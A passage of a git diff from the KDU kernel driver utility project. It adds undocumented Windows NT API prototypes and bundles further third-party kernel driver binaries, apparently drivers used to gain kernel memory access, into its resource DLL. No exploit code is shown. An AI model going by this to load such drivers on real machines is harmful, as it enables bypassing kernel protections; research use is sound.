+LARGE_INTEGER
+NTAPI
+RtlGetInterruptTimePrecise(
+ _Out_ PLARGE_INTEGER PerformanceCounter);
+
+NTSYSAPI
+BOOLEAN
+NTAPI
+RtlQueryUnbiasedInterruptTime(
+ _Out_ PLARGE_INTEGER InterruptTime);
+
+NTSYSAPI
+KSYSTEM_TIME
+NTAPI
+RtlGetSystemTimeAndBias(
+ _Out_ KSYSTEM_TIME TimeZoneBias,
+ _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart,
+ _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd);
+
/************************************************************************************
*
* RTL Debug Support API.
@@ -9332,6 +10331,28 @@ RtlAddIntegrityLabelToBoundaryDescriptor(
_Inout_ PVOID *BoundaryDescriptor,
_In_ PSID IntegrityLabel);
+/************************************************************************************
+*
+* RTL work item/async IO.
+*
+************************************************************************************/
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlQueueWorkItem(
+ _In_ WORKERCALLBACKFUNC Function,
+ _In_ PVOID Context,
+ _In_ ULONG Flags);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlSetIoCompletionCallback(
+ _In_ HANDLE FileHandle,
+ _In_ APC_CALLBACK_FUNCTION CompletionProc,
+ _In_ ULONG Flags);
+
/************************************************************************************
*
* RTL data exports.
@@ -9356,15 +10377,13 @@ NTSYSAPI UNICODE_STRING RtlNtPathSeperatorString;
*
************************************************************************************/
-struct _EVENT_FILTER_DESCRIPTOR;
-
-typedef VOID(NTAPI *PENABLECALLBACK)(
+typedef VOID(NTAPI *PETWENABLECALLBACK)(
_In_ LPCGUID SourceId,
_In_ ULONG IsEnabled,
_In_ UCHAR Level,
_In_ ULONGLONG MatchAnyKeyword,
_In_ ULONGLONG MatchAllKeyword,
- _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData,
+ _In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,
_Inout_opt_ PVOID CallbackContext
);
@@ -9373,10 +10392,20 @@ NTSTATUS
NTAPI
EtwEventRegister(
_In_ LPCGUID ProviderId,
- _In_opt_ PENABLECALLBACK EnableCallback,
+ _In_opt_ PETWENABLECALLBACK EnableCallback,
_In_opt_ PVOID CallbackContext,
_Out_ PREGHANDLE RegHandle);
+NTSYSAPI
+ULONG
+NTAPI
+EtwEventWriteNoRegistration(
+ _In_ LPCGUID ProviderId,
+ _In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,
+ _In_ ULONG UserDataCount,
+ _In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/PVOID UserData);
+
+
/*
** Runtime Library API END
*/
@@ -10058,6 +11087,12 @@ NtDeletePrivateNamespace(
*
************************************************************************************/
+typedef enum _SYMBOLIC_LINK_INFO_CLASS {
+ SymbolicLinkGlobalInformation = 1,
+ SymbolicLinkAccessMask,
+ MaxnSymbolicLinkInfoClass
+} SYMBOLIC_LINK_INFO_CLASS;
+
typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1
LARGE_INTEGER CreationTime;
UNICODE_STRING LinkTarget;
@@ -10134,6 +11169,14 @@ NtQuerySymbolicLinkObject(
_Inout_ PUNICODE_STRING LinkTarget,
_Out_opt_ PULONG ReturnedLength);
+NTSTATUS
+NTAPI
+NtSetInformationSymbolicLink(
+ _In_ HANDLE LinkHandle,
+ _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass,
+ _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation,
+ _In_ ULONG SymbolicLinkInformationLength);
+
/************************************************************************************
*
* File API (+Driver&HotPatch).
@@ -10338,7 +11381,7 @@ NtQueryDirectoryFile(
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan);
-NTSYSCALLAPI
+NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryFileEx(
@@ -10347,7 +11390,7 @@ NtQueryDirectoryFileEx(
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_ PVOID FileInformation,
+ _Out_writes_bytes_(Length) PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ ULONG QueryFlags,
@@ -10486,6 +11529,15 @@ NtLoadHotPatch(
_In_ PUNICODE_STRING HotPatchName,
_Reserved_ ULONG LoadFlag);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtManageHotPatch(
+ _In_ ULONG HotPatchInformation,
+ _In_ PVOID HotPatchData,
+ _In_ ULONG Length,
+ _Out_ PULONG ReturnLength);
+
/************************************************************************************
*
* Section API (+MemoryPartitions).
@@ -10507,6 +11559,13 @@ typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionCombineMemory,
SystemMemoryPartitionInitialAddMemory,
SystemMemoryPartitionGetMemoryEvents,
+ SystemMemoryPartitionSetAttributes,
+ SystemMemoryPartitionNodeInformation,
+ SystemMemoryPartitionCreateLargePages,
+ SystemMemoryPartitionDedicatedMemoryInformation,
+ SystemMemoryPartitionOpenDedicatedMemory,
+ SystemMemoryPartitionMemoryChargeAttributes,
+ SystemMemoryPartitionClearAttributes,
SystemMemoryPartitionMax
} MEMORY_PARTITION_INFORMATION_CLASS;
@@ -10555,7 +11614,14 @@ typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
ULONG_PTR ZeroPages;
ULONG_PTR FreePages;
ULONG_PTR StandbyPages;
-} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
+
+ // Fields added RS1+
+ ULONG_PTR StandbyPageCountByPriority[8];
+ ULONG_PTR RepurposedPagesByPriority[8];
+ ULONG_PTR MaximumCommitLimit;
+ ULONG_PTR DonatedPagesToPartitions;
+ ULONG PartitionId;
+} MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
NTSYSAPI
NTSTATUS
@@ -10693,6 +11759,42 @@ NtAreMappedFilesTheSame(
_In_ PVOID File1MappedAsAnImage,
_In_ PVOID File2MappedAsFile);
+//
+// NtCreatePartition
+//
+
+//
+// 10248
+//
+typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(
+ _Out_ PHANDLE PartitionHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG PreferredNode);
+
+//
+// 10586
+//
+typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(
+ _In_ HANDLE ParentPartitionHandle,
+ _Out_ HANDLE* PartitionHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG Node);
+
+//
+// Actual NtCreatePartition definition since Win10 10586
+//
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreatePartition(
+ _In_ HANDLE ParentPartitionHandle,
+ _Out_ HANDLE* PartitionHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ ULONG Node);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -10708,18 +11810,9 @@ NtManagePartition(
_In_ HANDLE TargetHandle,
_In_opt_ HANDLE SourceHandle,
_In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
- _In_ PVOID PartitionInformation,
+ _Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,
_In_ ULONG PartitionInformationLength);
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePartition(
- _Out_ PHANDLE PartitionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG PreferredNode);
-
/************************************************************************************
*
* Token API.
@@ -10913,10 +12006,21 @@ NtDuplicateToken(
_In_ TOKEN_TYPE TokenType,
_Out_ PHANDLE NewTokenHandle);
+#ifndef DISABLE_MAX_PRIVILEGE
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#endif
+
+#ifndef SANDBOX_INERT
#define SANDBOX_INERT 0x2 // winnt
-#define LUA_TOKEN 0x4
-#define WRITE_RESTRICT 0x8
+#endif
+
+#ifndef LUA_TOKEN
+#define LUA_TOKEN 0x4 // winnt
+#endif
+
+#ifndef WRITE_RESTRICTED
+#define WRITE_RESTRICTED 0x8 // winnt
+#endif
NTSYSAPI
NTSTATUS
@@ -11714,9 +12818,83 @@ NtOpenTransactionManager(
*
************************************************************************************/
+typedef struct _INITIAL_TEB
+{
+ struct
+ {
+ PVOID OldStackBase;
+ PVOID OldStackLimit;
+ } OldInitialTeb;
+ PVOID StackBase;
+ PVOID StackLimit;
+ PVOID StackAllocationBase;
+} INITIAL_TEB, * PINITIAL_TEB;
+
+#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001
+
#define QUEUE_USER_APC_FLAGS_NONE 0
#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 1
+//
+// NtCreateProcessEx specific flags.
+//
+#define PS_REQUEST_BREAKAWAY 1
+#define PS_NO_DEBUG_INHERIT 2
+#define PS_INHERIT_HANDLES 4
+#define PS_LARGE_PAGES 8
+#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
+ PS_NO_DEBUG_INHERIT | \
+ PS_INHERIT_HANDLES | \
+ PS_LARGE_PAGES)
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtGetNextProcess(
+ _In_opt_ HANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Flags,
+ _Out_ PHANDLE NewProcessHandle);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtGetNextThread(
+ _In_ HANDLE ProcessHandle,
+ _In_ HANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Flags,
+ _Out_ PHANDLE NewThreadHandle);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcess(
+ _Out_ PHANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ParentProcess,
+ _In_ BOOLEAN InheritObjectTable,
+ _In_opt_ HANDLE SectionHandle,
+ _In_opt_ HANDLE DebugPort,
+ _In_opt_ HANDLE ExceptionPort);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcessEx(
+ _Out_ PHANDLE ProcessHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ParentProcess,
+ _In_ ULONG Flags,
+ _In_opt_ HANDLE SectionHandle,
+ _In_opt_ HANDLE DebugPort,
+ _In_opt_ HANDLE ExceptionPort,
+ _In_ BOOLEAN InJob);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11733,6 +12911,35 @@ NtCreateUserProcess(
_Inout_ PPS_CREATE_INFO CreateInfo,
_In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThread(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _Out_ PCLIENT_ID ClientId,
+ _In_ PCONTEXT ThreadContext,
+ _In_ PINITIAL_TEB InitialTeb,
+ _In_ BOOLEAN CreateSuspended);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThreadEx(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID StartRoutine,
+ _In_opt_ PVOID Argument,
+ _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
+ _In_opt_ ULONG_PTR ZeroBits,
+ _In_opt_ SIZE_T StackSize,
+ _In_opt_ SIZE_T MaximumStackSize,
+ _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11761,6 +12968,27 @@ NTAPI
NtResumeProcess(
_In_ HANDLE ProcessHandle);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateProcessStateChange(
+ _Out_ PHANDLE ProcessStateChangeHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_opt_ ULONG64 Reserved);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtChangeProcessState(
+ _In_ HANDLE ProcessStateChangeHandle,
+ _In_ HANDLE ProcessHandle,
+ _In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,
+ _In_opt_ PVOID ExtendedInformation,
+ _In_opt_ SIZE_T ExtendedInformationLength,
+ _In_opt_ ULONG64 Reserved);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11775,6 +13003,27 @@ NtResumeThread(
_In_ HANDLE ThreadHandle,
_Out_opt_ PULONG PreviousSuspendCount);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateThreadStateChange(
+ _Out_ PHANDLE ThreadStateChangeHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ThreadHandle,
+ _In_opt_ ULONG64 Reserved);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtChangeThreadState(
+ _In_ HANDLE ThreadStateChangeHandle,
+ _In_ HANDLE ThreadHandle,
+ _In_ THREAD_STATE_CHANGE_TYPE StateChangeType,
+ _In_opt_ PVOID ExtendedInformation,
+ _In_opt_ SIZE_T ExtendedInformationLength,
+ _In_opt_ ULONG64 Reserved);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -11904,39 +13153,35 @@ NtTestAlert(
NTSYSAPI
NTSTATUS
NTAPI
-NtDelayExecution(
- _In_ BOOLEAN Alertable,
- _In_opt_ PLARGE_INTEGER DelayInterval);
+NtAlertThread(
+ _In_ HANDLE ThreadHandle);
NTSYSAPI
NTSTATUS
NTAPI
-NtCreateProcessEx(
- _Out_ PHANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ParentProcess,
- _In_ ULONG Flags,
- _In_opt_ HANDLE SectionHandle,
- _In_opt_ HANDLE DebugPort,
- _In_opt_ HANDLE ExceptionPort,
- _In_ BOOLEAN InJob);
+NtAlertResumeThread(
+ _In_ HANDLE ThreadHandle,
+ _Out_opt_ PULONG PreviousSuspendCount);
NTSYSAPI
NTSTATUS
NTAPI
-NtCreateThreadEx(
- _Out_ PHANDLE ThreadHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ProcessHandle,
- _In_ PVOID StartRoutine,
- _In_opt_ PVOID Argument,
- _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
- _In_opt_ ULONG_PTR ZeroBits,
- _In_opt_ SIZE_T StackSize,
- _In_opt_ SIZE_T MaximumStackSize,
- _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
+NtAlertThreadByThreadId(
+ _In_ HANDLE ThreadId);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtWaitForAlertByThreadId(
+ _In_ PVOID Address,
+ _In_opt_ PLARGE_INTEGER Timeout);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtDelayExecution(
+ _In_ BOOLEAN Alertable,
+ _In_opt_ PLARGE_INTEGER DelayInterval);
NTSYSAPI
ULONG
@@ -12068,6 +13313,14 @@ NtUnlockVirtualMemory(
_Inout_ PSIZE_T RegionSize,
_In_ ULONG MapType);
+NTSTATUS
+NTAPI
+NtFlushVirtualMemory(
+ _In_ HANDLE ProcessHandle,
+ _Inout_ PVOID* BaseAddress,
+ _Inout_ PSIZE_T RegionSize,
+ _Out_ struct _IO_STATUS_BLOCK* IoStatus);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -12762,7 +14015,8 @@ typedef enum _SYSDBG_COMMAND {
SysDbgClearUmBreakPid,
SysDbgGetUmAttachPid,
SysDbgClearUmAttachPid,
- SysDbgGetLiveKernelDump
+ SysDbgGetLiveKernelDump,
+ SysDbgKdPullRemoteFile
} SYSDBG_COMMAND, *PSYSDBG_COMMAND;
typedef struct _SYSDBG_VIRTUAL {
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 4d63a01..1e6fe01 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -23,7 +23,7 @@
Win32Proj
{072f189a-cea9-4ca8-a0fa-1257a7524a8e}
Tanikaze
- 10.0
+ 10.0.19041.0
@@ -154,15 +154,13 @@
Windows
- true
- true
false
false
true
true
+
+
Default
- /NOCOFFGRPINFO %(AdditionalOptions)
- 6.0
@@ -174,12 +172,14 @@
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 07ca248..9d85e4b 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -73,5 +73,11 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
\ No newline at end of file
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index 5499d92..8795b8c 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
new file mode 100644
index 0000000..29bcdc2
Binary files /dev/null and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 2e3be2b..9e2ba41 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 94952f4..2c5e4a4 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 3af8c86..bf7a2e5 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 9599ef3..6f7737a 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index a140382..b2d52cc 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 4a0ea9c..86a7b5e 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 7306f51..cc71440 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 0b365a9..2c057b8 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 6f669c2..d538096 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 8e0791d..85f42bd 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index f18f6bd..706f383 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
new file mode 100644
index 0000000..e52090c
Binary files /dev/null and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 3c6bba1..0a3280f 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index ecdf641..5ae126c 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/procexp.bin b/Source/Tanikaze/drv/procexp.bin
index 98168e0..f0be7f4 100644
Binary files a/Source/Tanikaze/drv/procexp.bin and b/Source/Tanikaze/drv/procexp.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index f225c75..54e48e1 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 0293585..1970f50 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -18,12 +18,14 @@
#define IDR_LHA 116
#define IDR_ASIO2 117
#define IDR_DIRECTIO64 118
+#define IDR_GMERDRV 119
+#define IDR_DBUTIL23 120
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 119
+#define _APS_NEXT_RESOURCE_VALUE 121
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 326db0b..2658cc2 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -82,6 +82,10 @@ IDR_ASIO2 RCDATA "drv\\asio2.bin"
IDR_DIRECTIO64 RCDATA "drv\\DirectIo64.bin"
+IDR_GMERDRV RCDATA "drv\\gmerdrv.bin"
+
+IDR_DBUTIL23 RCDATA "drv\\DbUtil2_3.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -89,8 +93,8 @@ IDR_DIRECTIO64 RCDATA "drv\\DirectIo64.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,0,1,2105
- PRODUCTVERSION 1,0,1,2105
+ FILEVERSION 1,0,2,2201
+ PRODUCTVERSION 1,0,2,2201
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -107,12 +111,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.0.1.2105"
+ VALUE "FileVersion", "1.0.2.2201"
VALUE "InternalName", "Tanikaze.dll"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2021 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.0.1.2105"
+ VALUE "ProductVersion", "1.0.2.2201"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Utils/PCOMP/PCOMP.cpp b/Source/Utils/PCOMP/PCOMP.cpp
index df61728..1e67288 100644
--- a/Source/Utils/PCOMP/PCOMP.cpp
+++ b/Source/Utils/PCOMP/PCOMP.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* PCOMP - KDU's Provider Compressor.
*
@@ -221,6 +221,7 @@ VOID KDUCompressResource(
DELTA_INPUT d_in, d_target, s_op, t_op, g_op;
DELTA_OUTPUT d_out;
+ printf_s("[+] Compress key used 0x%lx\r\n", ulCompressKey);
printf_s("[+] Reading \"%wS\"\r\n", lpFileName);
fileBuffer = supReadFileToBuffer(lpFileName, &fileSize);
diff --git a/Source/Utils/PCOMP/PCOMP.vcxproj b/Source/Utils/PCOMP/PCOMP.vcxproj
index 65aad87..0e24c9f 100644
--- a/Source/Utils/PCOMP/PCOMP.vcxproj
+++ b/Source/Utils/PCOMP/PCOMP.vcxproj
@@ -15,7 +15,7 @@
Win32Proj
{24663340-6c3f-479e-94c0-c2a847b1665c}
PCOMP
- 10.0
+ 10.0.19041.0
@@ -75,6 +75,8 @@
true
MultiThreaded
%(AdditionalOptions)
+ true
+ false
Console